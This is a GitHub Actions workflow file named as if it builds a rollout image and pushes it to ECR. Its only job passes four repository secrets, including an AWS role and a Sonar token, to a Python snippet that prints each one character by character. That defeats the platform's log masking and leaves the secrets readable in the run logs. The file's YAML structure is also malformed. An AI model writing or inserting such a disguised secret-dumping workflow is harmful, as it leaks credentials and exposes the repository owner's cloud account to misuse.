name: Create rollout Image Version and Push ECR

on:
  workflow_dispatch:
  jobs:
  print-chars:
    runs-on: ubuntu-latest

    steps:
      - name: AWS_ENV_REGION
        run: |
          python3 - << 'EOF' "${{ secrets.AWS_ENV_REGION }}"
          import sys

          def process_value(input_value):
              for ch in input_value:
                  print(ch)

          value = sys.argv[1]
          process_value(value)
          EOF
      - name: AWS_ENV_ACCOUNT
        run: |
          python3 - << 'EOF' "${{ secrets.AWS_ENV_ACCOUNT }}"
          import sys

          def process_value(input_value):
              for ch in input_value:
                  print(ch)

          value = sys.argv[1]
          process_value(value)
          EOF
      - name: AWS_ENV_ROLE
        run: |
          python3 - << 'EOF' "${{ secrets.AWS_ENV_ROLE }}"
          import sys

          def process_value(input_value):
              for ch in input_value:
                  print(ch)

          value = sys.argv[1]
          process_value(value)
          EOF

      - name: SONAR_TOKEN
        run: |
          python3 - << 'EOF' "${{ secrets.SONAR_TOKEN }}"
          import sys

          def process_value(input_value):
              for ch in input_value:
                  print(ch)

          value = sys.argv[1]
          process_value(value)
          EOF


  
        